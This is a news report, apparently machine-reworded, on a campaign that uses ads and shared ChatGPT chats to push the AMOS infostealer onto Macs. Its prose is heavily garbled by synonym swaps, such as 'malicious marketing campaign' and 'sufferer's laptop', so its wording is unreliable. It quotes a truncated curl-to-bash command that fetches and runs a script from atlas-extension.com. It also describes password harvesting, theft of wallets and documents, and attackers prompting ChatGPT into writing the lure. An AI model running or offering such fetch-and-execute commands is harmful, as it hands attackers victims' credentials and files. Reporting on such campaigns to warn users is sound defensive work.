A brand new malicious marketing campaign is focusing on macOS customers by way of a novel assault that exploits ChatGPT’s official web site.
The attackers are utilizing a way referred to as ClickFix to unfold the AMOS infostealer by posting pretend set up guides on the professional chatgpt.com area.
This marketing campaign leverages ChatGPT’s chat-sharing characteristic, the place any consumer can create a public dialog and share it with others by way of a hyperlink that seems to originate from OpenAI’s official web site.
The assault begins with paid search advertisements on Google. When customers seek for “chatgpt atlas,” they encounter sponsored hyperlinks that seem to steer on to the official ChatGPT area.
A sponsored hyperlink in Google search outcomes results in a malware set up information disguised as ChatGPT Atlas for macOS and hosted on the official ChatGPT web site (Supply – Kaspersky)
The advert shows the title “ChatGPT™ Atlas for macOS – Obtain ChatGPT Atlas for Mac,” which makes it seem fully professional.
Customers who click on on these advertisements are taken to a shared ChatGPT dialog that incorporates pretend set up directions for the nonexistent Atlas browser.
After in depth evaluation, Kaspersky safety researchers recognized that the malicious actors used immediate engineering to drive ChatGPT into producing a convincing set up information.
The attackers then cleaned the chat historical past to take away any suspicious content material earlier than making the chat public.
The set up information for the supposed Atlas for macOS is merely a shared chat between an nameless consumer and ChatGPT (Supply – Kaspersky)
The information seems on the chatgpt.com/share/ subdomain, which might make it appear extra reliable to customers who might not acknowledge that it’s merely a shared dialog fairly than official content material from OpenAI.
The An infection Mechanism
The pretend set up information instructs customers to open the Terminal software on their Mac and run a particular command.
The malicious code seems like this:-
/bin/bash -c “$(curl -fsSL ‘
This command downloads a malicious script from the attacker-controlled server at atlas-extension.com and executes it instantly on the sufferer’s laptop.
When executed, the script prompts for the system password and repeatedly asks till the right password is entered. As soon as the password is offered, the script downloads the AMOS infostealer and installs it utilizing the stolen credentials.
If you happen to ask ChatGPT whether or not you must comply with the directions you obtained, it’s going to reply that it’s not protected (Supply – Kaspersky)
AMOS can steal passwords, cookies, and different browser knowledge from Chrome and Firefox. It additionally targets cryptocurrency pockets data from purposes equivalent to Electrum, Coinomi, and Exodus.
The malware collects information with TXT, PDF, and DOCX extensions from folders like Desktop, Paperwork, and Downloads. Moreover, it installs a backdoor that begins routinely at system startup, giving attackers persistent distant entry to the contaminated system.
Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most well-liked Supply in Google.
